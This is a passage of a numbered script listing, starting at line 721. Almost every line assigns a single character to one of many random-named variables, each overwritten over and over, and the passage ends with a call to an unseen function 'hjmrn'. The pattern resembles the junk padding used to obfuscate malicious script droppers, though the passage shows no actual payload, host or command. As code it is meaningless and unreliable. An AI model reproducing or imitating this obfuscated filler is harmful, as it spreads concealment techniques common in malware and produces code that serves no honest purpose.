721 | odyocmpfb = "G"; | |
722 | odyocmpfb = "x"; | |
723 | odyocmpfb = "U"; | |
724 | odyocmpfb = "k"; | |
725 | odyocmpfb = "S"; | |
726 | odyocmpfb = "p"; | |
727 | jlrycetzn = "k"; | |
728 | jlrycetzn = "z"; | |
729 | jlrycetzn = "t"; | |
730 | jlrycetzn = "b"; | |
731 | jlrycetzn = "b"; | |
732 | jlrycetzn = "G"; | |
733 | jlrycetzn = "g"; | |
734 | jlrycetzn = "K"; | |
735 | jlrycetzn = "x"; | |
736 | jlrycetzn = "x"; | |
737 | jlrycetzn = "H"; | |
738 | jlrycetzn = "U"; | |
739 | jlrycetzn = "W"; | |
740 | jlrycetzn = "S"; | |
741 | jlrycetzn = "W"; | |
742 | jlrycetzn = "h"; | |
743 | jlrycetzn = "x"; | |
744 | jlrycetzn = "o"; | |
745 | hdogzgda = "e"; | |
746 | hdogzgda = "z"; | |
747 | hdogzgda = "e"; | |
748 | hdogzgda = "e"; | |
749 | hdogzgda = "Q"; | |
750 | hdogzgda = "G"; | |
751 | hdogzgda = "L"; | |
752 | hfxfqjk = "x"; | |
753 | hfxfqjk = "u"; | |
754 | hfxfqjk = "s"; | |
755 | hfxfqjk = "O"; | |
756 | hfxfqjk = "F"; | |
757 | hfxfqjk = "L"; | |
758 | hfxfqjk = "C"; | |
759 | hfxfqjk = "q"; | |
760 | hfxfqjk = "Q"; | |
761 | hfxfqjk = "N"; | |
762 | hfxfqjk = "t"; | |
763 | hfxfqjk = "T"; | |
764 | hfxfqjk = "u"; | |
765 | hfxfqjk = "u"; | |
766 | hfxfqjk = "o"; | |
767 | hfxfqjk = "Y"; | |
768 | hfxfqjk = "t"; | |
769 | hfxfqjk = "K"; | |
770 | hfxfqjk = "j"; | |
771 | hfxfqjk = "f"; | |
772 | hfxfqjk = "r"; | |
773 | hfxfqjk = "V"; | |
774 | hfxfqjk = "w"; | |
775 | hfxfqjk = "m"; | |
776 | hfxfqjk = "c"; | |
777 | hfxfqjk = "M"; | |
778 | hfxfqjk = "D"; | |
779 | hfxfqjk = "G"; | |
780 | hfxfqjk = "Z"; | |
781 | hfxfqjk = "R"; | |
782 | hfxfqjk = "d"; | |
783 | hfxfqjk = "N"; | |
784 | hfxfqjk = "S"; | |
785 | hfxfqjk = "x"; | |
786 | hfxfqjk = "W"; | |
787 | hfxfqjk = "Y"; | |
788 | xoszv = "p"; | |
789 | xoszv = "F"; | |
790 | xoszv = "G"; | |
791 | xoszv = "I"; | |
792 | xoszv = "Q"; | |
793 | xoszv = "p"; | |
794 | xoszv = "T"; | |
795 | xoszv = "z"; | |
796 | xoszv = "U"; | |
797 | xoszv = "J"; | |
798 | xoszv = "B"; | |
799 | xoszv = "V"; | |
800 | xoszv = "m"; | |
801 | xoszv = "I"; | |
802 | xoszv = "r"; | |
803 | xoszv = "B"; | |
804 | xoszv = "Y"; | |
805 | xoszv = "x"; | |
806 | xoszv = "W"; | |
807 | xoszv = "M"; | |
808 | xoszv = "G"; | |
809 | xoszv = "o"; | |
810 | xoszv = "z"; | |
811 | xoszv = "E"; | |
812 | xoszv = "O"; | |
813 | xoszv = "v"; | |
814 | xoszv = "C"; | |
815 | xoszv = "j"; | |
816 | xoszv = "y"; | |
817 | xoszv = "k"; | |
818 | xoszv = "a"; | |
819 | xoszv = "v"; | |
820 | xoszv = "q"; | |
821 | mcfcqa = "G"; | |
822 | mcfcqa = "O"; | |
823 | mcfcqa = "h"; | |
824 | mcfcqa = "d"; | |
825 | mcfcqa = "W"; | |
826 | mcfcqa = "Q"; | |
827 | mcfcqa = "f"; | |
828 | mcfcqa = "Y"; | |
829 | mcfcqa = "D"; | |
830 | mcfcqa = "J"; | |
831 | mcfcqa = "l"; | |
832 | mcfcqa = "w"; | |
833 | mcfcqa = "H"; | |
834 | mcfcqa = "P"; | |
835 | mcfcqa = "p"; | |
836 | mcfcqa = "e"; | |
837 | mcfcqa = "c"; | |
838 | mcfcqa = "H"; | |
839 | mcfcqa = "E"; | |
840 | mcfcqa = "j"; | |
841 | mcfcqa = "d"; | |
842 | mcfcqa = "X"; | |
843 | mcfcqa = "R"; | |
844 | mcfcqa = "d"; | |
845 | mcfcqa = "a"; | |
846 | mcfcqa = "n"; | |
847 | mcfcqa = "y"; | |
848 | mcfcqa = "F"; | |
849 | mcfcqa = "I"; | |
850 | fkfws = "V"; | |
851 | fkfws = "T"; | |
852 | fkfws = "w"; | |
853 | fkfws = "W"; | |
854 | fkfws = "c"; | |
855 | fkfws = "S"; | |
856 | fkfws = "k"; | |
857 | fkfws = "Z"; | |
858 | fkfws = "G"; | |
859 | fkfws = "J"; | |
860 | fkfws = "z"; | |
861 | fkfws = "I"; | |
862 | fkfws = "v"; | |
863 | fkfws = "j"; | |
864 | fkfws = "c"; | |
865 | fkfws = "T"; | |
866 | fkfws = "Y"; | |
867 | fkfws = "K"; | |
868 | fkfws = "h"; | |
869 | fkfws = "a"; | |
870 | fkfws = "r"; | |
871 | fkfws = "e"; | |
872 | fkfws = "j"; | |
873 | fkfws = "v"; | |
874 | fkfws = "f"; | |
875 | fkfws = "s"; | |
876 | fkfws = "i"; | |
877 | fkfws = "N"; | |
878 | fkfws = "S"; | |
879 | fkfws = "n"; | |
880 | fkfws = "U"; | |
881 | fkfws = "&"; | |
882 | koswsfasc = "I"; | |
883 | koswsfasc = "G"; | |
884 | koswsfasc = "n"; | |
885 | koswsfasc = "j"; | |
886 | koswsfasc = "Z"; | |
887 | koswsfasc = "u"; | |
888 | koswsfasc = "m"; | |
889 | koswsfasc = "u"; | |
890 | koswsfasc = "z"; | |
891 | koswsfasc = "d"; | |
892 | koswsfasc = "F"; | |
893 | koswsfasc = "K"; | |
894 | koswsfasc = "M"; | |
895 | koswsfasc = "L"; | |
896 | koswsfasc = "l"; | |
897 | koswsfasc = "t"; | |
898 | koswsfasc = "r"; | |
899 | koswsfasc = "b"; | |
900 | koswsfasc = "u"; | |
901 | koswsfasc = "u"; | |
902 | koswsfasc = "F"; | |
903 | koswsfasc = "c"; | |
904 | koswsfasc = "w"; | |
905 | koswsfasc = "W"; | |
906 | koswsfasc = "f"; | |
907 | koswsfasc = "F"; | |
908 | koswsfasc = "X"; | |
909 | koswsfasc = "k"; | |
910 | koswsfasc = "t"; | |
911 | koswsfasc = "a"; | |
912 | koswsfasc = "W"; | |
913 | koswsfasc = "G"; | |
914 | koswsfasc = "n"; | |
915 | koswsfasc = " "; | |
916 | dgmss = "I"; | |
917 | dgmss = "K"; | |
918 | dgmss = "V"; | |
919 | dgmss = "j"; | |
920 | dgmss = "1"; | |
921 | lyvqy = "p"; | |
922 | lyvqy = "L"; | |
923 | lyvqy = "E"; | |
924 | lyvqy = "D"; | |
925 | lyvqy = "X"; | |
926 | lyvqy = "A"; | |
927 | lyvqy = "p"; | |
928 | lyvqy = "U"; | |
929 | lyvqy = "8"; | |
930 | nqfhcg = "p"; | |
931 | nqfhcg = "x"; | |
932 | nqfhcg = "x"; | |
933 | nqfhcg = "u"; | |
934 | nqfhcg = "T"; | |
935 | nqfhcg = "D"; | |
936 | nqfhcg = "S"; | |
937 | nqfhcg = "c"; | |
938 | nqfhcg = "i"; | |
939 | nqfhcg = "b"; | |
940 | nqfhcg = "W"; | |
941 | nqfhcg = "Z"; | |
942 | nqfhcg = "H"; | |
943 | nqfhcg = "X"; | |
944 | nqfhcg = "x"; | |
945 | nqfhcg = "L"; | |
946 | nqfhcg = "g"; | |
947 | nqfhcg = "I"; | |
948 | nqfhcg = "O"; | |
949 | nqfhcg = "f"; | |
950 | nqfhcg = "u"; | |
951 | kmfhlzjc = "U"; | |
952 | kmfhlzjc = "Q"; | |
953 | kmfhlzjc = "L"; | |
954 | kmfhlzjc = "b"; | |
955 | kmfhlzjc = "A"; | |
956 | kmfhlzjc = "E"; | |
957 | kmfhlzjc = "D"; | |
958 | kmfhlzjc = "g"; | |
959 | kmfhlzjc = "Y"; | |
960 | kmfhlzjc = "n"; | |
961 | kmfhlzjc = "r"; | |
962 | awuag = "A"; | |
963 | awuag = "v"; | |
964 | awuag = "R"; | |
965 | awuag = "H"; | |
966 | awuag = "b"; | |
967 | awuag = "z"; | |
968 | awuag = "H"; | |
969 | awuag = "K"; | |
970 | awuag = "W"; | |
971 | awuag = "z"; | |
972 | awuag = "f"; | |
973 | awuag = "M"; | |
974 | awuag = "R"; | |
975 | awuag = "c"; | |
976 | awuag = "S"; | |
977 | awuag = "f"; | |
978 | awuag = "R"; | |
979 | awuag = "l"; | |
980 | awuag = "r"; | |
981 | awuag = "I"; | |
982 | awuag = "M"; | |
983 | awuag = "L"; | |
984 | awuag = "f"; | |
985 | awuag = "R"; | |
986 | awuag = "p"; | |
987 | awuag = "l"; | |
988 | awuag = "P"; | |
989 | awuag = "p"; | |
990 | awuag = "N"; | |
991 | awuag = "d"; | |
992 | awuag = "n"; | |
993 | awuag = "X"; | |
994 | awuag = "x"; | |
995 | awuag = "D"; | |
996 | awuag = "Z"; | |
997 | awuag = "A"; | |
998 | awuag = "H"; | |
999 | awuag = "W"; | |
1000 | ogqkqnvc = "a"; | |
1001 | ogqkqnvc = "i"; | |
1002 | ogqkqnvc = "k"; | |
1003 | ogqkqnvc = "i"; | |
1004 | ogqkqnvc = "v"; | |
1005 | ogqkqnvc = "m"; | |
1006 | ogqkqnvc = "z"; | |
1007 | ogqkqnvc = "a"; | |
1008 | ogqkqnvc = "W"; | |
1009 | ogqkqnvc = "f"; | |
1010 | ogqkqnvc = "B"; | |
1011 | ogqkqnvc = "z"; | |
1012 | ogqkqnvc = "E"; | |
1013 | ogqkqnvc = "I"; | |
1014 | ogqkqnvc = "o"; | |
1015 | ogqkqnvc = "s"; | |
1016 | ogqkqnvc = "Z"; | |
1017 | ogqkqnvc = "f"; | |
1018 | ogqkqnvc = "Q"; | |
1019 | ogqkqnvc = "y"; | |
1020 | ogqkqnvc = "t"; | |
1021 | ogqkqnvc = "t"; | |
1022 | ogqkqnvc = "t"; | |
1023 | ogqkqnvc = "p"; | |
1024 | ogqkqnvc = "B"; | |
1025 | ogqkqnvc = "K"; | |
1026 | ogqkqnvc = "u"; | |
1027 | ogqkqnvc = "t"; | |
1028 | flpvouck = "v"; | |
1029 | flpvouck = "s"; | |
1030 | flpvouck = "I"; | |
1031 | flpvouck = "u"; | |
1032 | flpvouck = "s"; | |
1033 | flpvouck = "d"; | |
1034 | flpvouck = "i"; | |
1035 | flpvouck = "b"; | |
1036 | flpvouck = "j"; | |
1037 | flpvouck = "e"; | |
1038 | flpvouck = "u"; | |
1039 | flpvouck = "x"; | |
1040 | flpvouck = "f"; | |
1041 | flpvouck = "S"; | |
1042 | flpvouck = "C"; | |
1043 | flpvouck = "f"; | |
1044 | flpvouck = "v"; | |
1045 | flpvouck = "A"; | |
1046 | flpvouck = "o"; | |
1047 | flpvouck = "N"; | |
1048 | flpvouck = "s"; | |
1049 | flpvouck = "E"; | |
1050 | flpvouck = "f"; | |
1051 | flpvouck = "b"; | |
1052 | flpvouck = "i"; | |
1053 | flpvouck = "e"; | |
1054 | flpvouck = "a"; | |
1055 | flpvouck = "a"; | |
1056 | flpvouck = "m"; | |
1057 | flpvouck = "T"; | |
1058 | flpvouck = "Q"; | |
1059 | flpvouck = "c"; | |
1060 | flpvouck = "p"; | |
1061 | flpvouck = "Y"; | |
1062 | flpvouck = "J"; | |
1063 | flpvouck = "f"; | |
1064 | flpvouck = "F"; | |
1065 | flpvouck = "u"; | |
1066 | flpvouck = "/"; | |
1067 | vflxyyam = "o"; | |
1068 | vflxyyam = "d"; | |
1069 | vflxyyam = "s"; | |
1070 | vflxyyam = "f"; | |
1071 | vflxyyam = "H"; | |
1072 | vflxyyam = "h"; | |
1073 | vflxyyam = "e"; | |
1074 | vflxyyam = "H"; | |
1075 | zdqslm = "z"; | |
1076 | zdqslm = "N"; | |
1077 | zdqslm = "A"; | |
1078 | zdqslm = "p"; | |
1079 | zdqslm = "m"; | |
1080 | zdqslm = "X"; | |
1081 | zdqslm = "c"; | |
1082 | zdqslm = "B"; | |
1083 | zdqslm = "G"; | |
1084 | zdqslm = "x"; | |
1085 | zdqslm = "S"; | |
1086 | zdqslm = "c"; | |
1087 | zdqslm = "z"; | |
1088 | zdqslm = "W"; | |
1089 | zdqslm = "n"; | |
1090 | zdqslm = "V"; | |
1091 | zdqslm = "i"; | |
1092 | zdqslm = "c"; | |
1093 | zdqslm = "X"; | |
1094 | zdqslm = "s"; | |
1095 | zdqslm = "u"; | |
1096 | zdqslm = "X"; | |
1097 | zdqslm = "O"; | |
1098 | zdqslm = "y"; | |
1099 | zdqslm = "P"; | |
1100 | vglsux = "f"; | |
1101 | vglsux = "p"; | |
1102 | vglsux = "W"; | |
1103 | vglsux = "d"; | |
1104 | vglsux = "V"; | |
1105 | vglsux = "L"; | |
1106 | vglsux = "n"; | |
1107 | vglsux = "i"; | |
1108 | vglsux = "T"; | |
1109 | vglsux = "t"; | |
1110 | vglsux = "J"; | |
1111 | vglsux = "t"; | |
1112 | vglsux = "z"; | |
1113 | vglsux = "M"; | |
1114 | vglsux = "m"; | |
1115 | vglsux = "R"; | |
1116 | vglsux = "v"; | |
1117 | vglsux = "n"; | |
1118 | vglsux = "A"; | |
1119 | vglsux = "F"; | |
1120 | vglsux = "C"; | |
1121 | vglsux = "Y"; | |
1122 | vglsux = "s"; | |
1123 | vglsux = "e"; | |
1124 | vglsux = "b"; | |
1125 | vglsux = "N"; | |
1126 | vglsux = "f"; | |
1127 | vglsux = "R"; | |
1128 | vglsux = "h"; | |
1129 | vglsux = "o"; | |
1130 | vglsux = "F"; | |
1131 | vglsux = "F"; | |
1132 | vglsux = "F"; | |
1133 | vglsux = "z"; | |
1134 | vglsux = "k"; | |
1135 | vglsux = "T"; | |
1136 | vglsux = "e"; | |
1137 | vglsux = "L"; | |
1138 | vglsux = "I"; | |
1139 | vglsux = "j"; | |
1140 | vglsux = "E"; | |
1141 | vglsux = "M"; | |
1142 | vglsux = "Y"; | |
1143 | vglsux = "g"; | |
1144 | vglsux = "C"; | |
1145 | pbncuuznn = "a"; | |
1146 | pbncuuznn = "U"; | |
1147 | pbncuuznn = "c"; | |
1148 | pbncuuznn = "L"; | |
1149 | pbncuuznn = "B"; | |
1150 | pbncuuznn = "L"; | |
1151 | pbncuuznn = "A"; | |
1152 | pbncuuznn = "A"; | |
1153 | pbncuuznn = "z"; | |
1154 | pbncuuznn = "z"; | |
1155 | pbncuuznn = "P"; | |
1156 | pbncuuznn = "l"; | |
1157 | pbncuuznn = "Z"; | |
1158 | pbncuuznn = "w"; | |
1159 | pbncuuznn = "g"; | |
1160 | pbncuuznn = "R"; | |
1161 | pbncuuznn = "K"; | |
1162 | pbncuuznn = "d"; | |
1163 | pbncuuznn = "Y"; | |
1164 | pbncuuznn = "u"; | |
1165 | pbncuuznn = "X"; | |
1166 | pbncuuznn = "e"; | |
1167 | pbncuuznn = "j"; | |
1168 | pbncuuznn = "G"; | |
1169 | pbncuuznn = "u"; | |
1170 | pbncuuznn = "D"; | |
1171 | pbncuuznn = "v"; | |
1172 | pbncuuznn = "4"; | |
1173 | phfzliyry = "Z"; | |
1174 | phfzliyry = "q"; | |
1175 | phfzliyry = "l"; | |
1176 | phfzliyry = "Q"; | |
1177 | phfzliyry = "w"; | |
1178 | phfzliyry = "D"; | |
1179 | phfzliyry = "j"; | |
1180 | phfzliyry = "s"; | |
1181 | phfzliyry = "Y"; | |
1182 | phfzliyry = "y"; | |
1183 | phfzliyry = "G"; | |
1184 | phfzliyry = "G"; | |
1185 | phfzliyry = "j"; | |
1186 | phfzliyry = "F"; | |
1187 | phfzliyry = "g"; | |
1188 | phfzliyry = "S"; | |
1189 | phfzliyry = "B"; | |
1190 | phfzliyry = "Q"; | |
1191 | phfzliyry = "K"; | |
1192 | phfzliyry = "H"; | |
1193 | phfzliyry = "n"; | |
1194 | phfzliyry = "M"; | |
1195 | phfzliyry = "q"; | |
1196 | phfzliyry = "V"; | |
1197 | phfzliyry = "U"; | |
1198 | phfzliyry = "T"; | |
1199 | phfzliyry = "j"; | |
1200 | phfzliyry = "R"; | |
1201 | phfzliyry = "K"; | |
1202 | phfzliyry = "U"; | |
1203 | phfzliyry = "O"; | |
1204 | rexnb = "i"; | |
1205 | rexnb = "L"; | |
1206 | rexnb = "H"; | |
1207 | rexnb = "R"; | |
1208 | rexnb = "I"; | |
1209 | rexnb = "a"; | |
1210 | rexnb = "n"; | |
1211 | rexnb = "t"; | |
1212 | rexnb = "a"; | |
1213 | rexnb = "o"; | |
1214 | rexnb = "U"; | |
1215 | rexnb = "o"; | |
1216 | rexnb = "t"; | |
1217 | rexnb = "b"; | |
1218 | rexnb = "p"; | |
1219 | rexnb = "T"; | |
1220 | rexnb = "n"; | |
1221 | rexnb = "f"; | |
1222 | rexnb = "C"; | |
1223 | rexnb = "m"; | |
1224 | rexnb = "R"; | |
1225 | rexnb = "n"; | |
1226 | rexnb = "S"; | |
1227 | rexnb = "z"; | |
1228 | rexnb = "D"; | |
1229 | rexnb = "o"; | |
1230 | rexnb = "W"; | |
1231 | rexnb = "T"; | |
1232 | rexnb = "X"; | |
1233 | rexnb = "K"; | |
1234 | rexnb = "C"; | |
1235 | rexnb = "x"; | |
1236 | rexnb = "i"; | |
1237 | rexnb = "c"; | |
1238 | vbeepue = "w"; | |
1239 | rujaazct = "R"; | |
1240 | rujaazct = "m"; | |
1241 | rujaazct = "U"; | |
1242 | rujaazct = "L"; | |
1243 | rujaazct = "Q"; | |
1244 | rujaazct = "v"; | |
1245 | rujaazct = "m"; | |
1246 | rujaazct = "L"; | |
1247 | rujaazct = "j"; | |
1248 | rujaazct = "H"; | |
1249 | rujaazct = "N"; | |
1250 | rujaazct = "W"; | |
1251 | rujaazct = "Z"; | |
1252 | rujaazct = "R"; | |
1253 | rujaazct = "U"; | |
1254 | rujaazct = "z"; | |
1255 | rujaazct = "n"; | |
1256 | rujaazct = "T"; | |
1257 | rujaazct = "I"; | |
1258 | rujaazct = "d"; | |
1259 | rujaazct = "c"; | |
1260 | rujaazct = "r"; | |
1261 | rujaazct = "I"; | |
1262 | rujaazct = "p"; | |
1263 | rujaazct = "b"; | |
1264 | rujaazct = "q"; | |
1265 | rujaazct = "w"; | |
1266 | rujaazct = "k"; | |
1267 | rujaazct = "G"; | |
1268 | rujaazct = "D"; | |
1269 | rujaazct = "U"; | |
1270 | rujaazct = "e"; | |
1271 | rujaazct = "K"; | |
1272 | rujaazct = "f"; | |
1273 | rujaazct = "u"; | |
1274 | rujaazct = "E"; | |
1275 | qpzpnoyds = "h"; | |
1276 | qpzpnoyds = "Q"; | |
1277 | qpzpnoyds = "W"; | |
1278 | qpzpnoyds = "A"; | |
1279 | qpzpnoyds = "q"; | |
1280 | qpzpnoyds = "H"; | |
1281 | qpzpnoyds = "l"; | |
1282 | qpzpnoyds = "x"; | |
1283 | qpzpnoyds = "e"; | |
1284 | qpzpnoyds = "G"; | |
1285 | qpzpnoyds = "v"; | |
1286 | qpzpnoyds = "D"; | |
1287 | qpzpnoyds = "P"; | |
1288 | qpzpnoyds = "n"; | |
1289 | qpzpnoyds = "I"; | |
1290 | qpzpnoyds = "v"; | |
1291 | qpzpnoyds = "e"; | |
1292 | qpzpnoyds = "q"; | |
1293 | qpzpnoyds = "K"; | |
1294 | qpzpnoyds = "U"; | |
1295 | zlyjeyu = "M"; | |
1296 | zlyjeyu = "s"; | |
1297 | zlyjeyu = "c"; | |
1298 | zlyjeyu = "W"; | |
1299 | zlyjeyu = "Z"; | |
1300 | zlyjeyu = "k"; | |
1301 | zlyjeyu = "g"; | |
1302 | qeuwt = "S"; | |
1303 | qeuwt = "j"; | |
1304 | qeuwt = "L"; | |
1305 | qeuwt = "s"; | |
1306 | qeuwt = "T"; | |
1307 | qeuwt = "T"; | |
1308 | qeuwt = "I"; | |
1309 | qeuwt = "y"; | |
1310 | qeuwt = "n"; | |
1311 | qeuwt = "n"; | |
1312 | qeuwt = "W"; | |
1313 | qeuwt = "n"; | |
1314 | qeuwt = "t"; | |
1315 | qeuwt = "b"; | |
1316 | pilhh = "N"; | |
1317 | pilhh = "b"; | |
1318 | pilhh = "I"; | |
1319 | pilhh = "s"; | |
1320 | pilhh = "y"; | |
1321 | pilhh = "O"; | |
1322 | pilhh = "l"; | |
1323 | pilhh = "B"; | |
1324 | pilhh = "P"; | |
1325 | pilhh = "y"; | |
1326 | pilhh = "a"; | |
1327 | pilhh = "l"; | |
1328 | pilhh = "o"; | |
1329 | pilhh = "d"; | |
1330 | pilhh = "n"; | |
1331 | pilhh = "l"; | |
1332 | pilhh = "m"; | |
1333 | pilhh = "f"; | |
1334 | pilhh = "k"; | |
1335 | pilhh = "O"; | |
1336 | pilhh = "a"; | |
1337 | pilhh = "f"; | |
1338 | pilhh = "C"; | |
1339 | pilhh = "L"; | |
1340 | pilhh = "m"; | |
1341 | pilhh = "r"; | |
1342 | pilhh = "G"; | |
1343 | pilhh = "N"; | |
1344 | pilhh = "A"; | |
1345 | pilhh = "G"; | |
1346 | pilhh = "F"; | |
1347 | pilhh = "k"; | |
1348 | pilhh = "t"; | |
1349 | pilhh = "z"; | |
1350 | pilhh = "U"; | |
1351 | pilhh = "j"; | |
1352 | bqkbkqcxw = "W"; | |
1353 | bqkbkqcxw = "q"; | |
1354 | bqkbkqcxw = "E"; | |
1355 | bqkbkqcxw = "X"; | |
1356 | bqkbkqcxw = "E"; | |
1357 | bqkbkqcxw = "I"; | |
1358 | bqkbkqcxw = "\""; | |
1359 | hjmrn ( ); |
|